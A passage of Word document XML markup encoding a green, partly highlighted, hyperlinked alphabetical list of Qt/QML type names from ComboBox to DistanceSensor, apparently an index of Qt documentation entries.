                <w:t>ColumnLayout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41" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ComboBox: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842" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ComboBox: QtQuickControls2</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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ComboBoxStyle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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Compass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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CompassReading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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Component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47" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Component3D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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ComputeCommand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49" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ConeGeometry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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ConeMesh</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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ConicalGradient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52" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Connections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53" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ContactDetail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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ContactDetails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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Container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56" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Context2D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57" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Context3D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58" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ContextMenuRequest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59" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Control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60" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>coordinate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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CoordinateAnimation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62" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CuboidGeometry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63" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CuboidMesh</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64" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CullFace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65" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CumulativeDirection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66" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Custom3DItem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67" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Custom3DLabel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68" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Custom3DVolume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69" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CustomParticle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70" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CylinderGeometry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871" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CylinderMesh</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65" w:name="d"/>
            <w:bookmarkEnd w:id="1165"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>D</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872" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Date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73" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>date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74" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DateTimeAxis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75" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DayOfWeekRow</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76" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DelayButton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77" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DelayButtonStyle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78" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DelegateModel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79" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DelegateModelGroup</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80" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DepthTest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81" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Desaturate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82" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Dial: QtQuickExtras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83" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Dial: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884" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Dialog: QtQuickDialogs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885" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Dialog: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886" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Dialog: QtLabsPlatform</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87" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DialogButtonBox</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88" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DialStyle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89" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DiffuseMapMaterial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90" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DiffuseSpecularMapMaterial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91" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Direction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92" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DirectionalBlur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93" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DirectionalLight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94" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DispatchCompute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95" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Displace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96" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DistanceReading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97" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>DistanceSensor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898" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
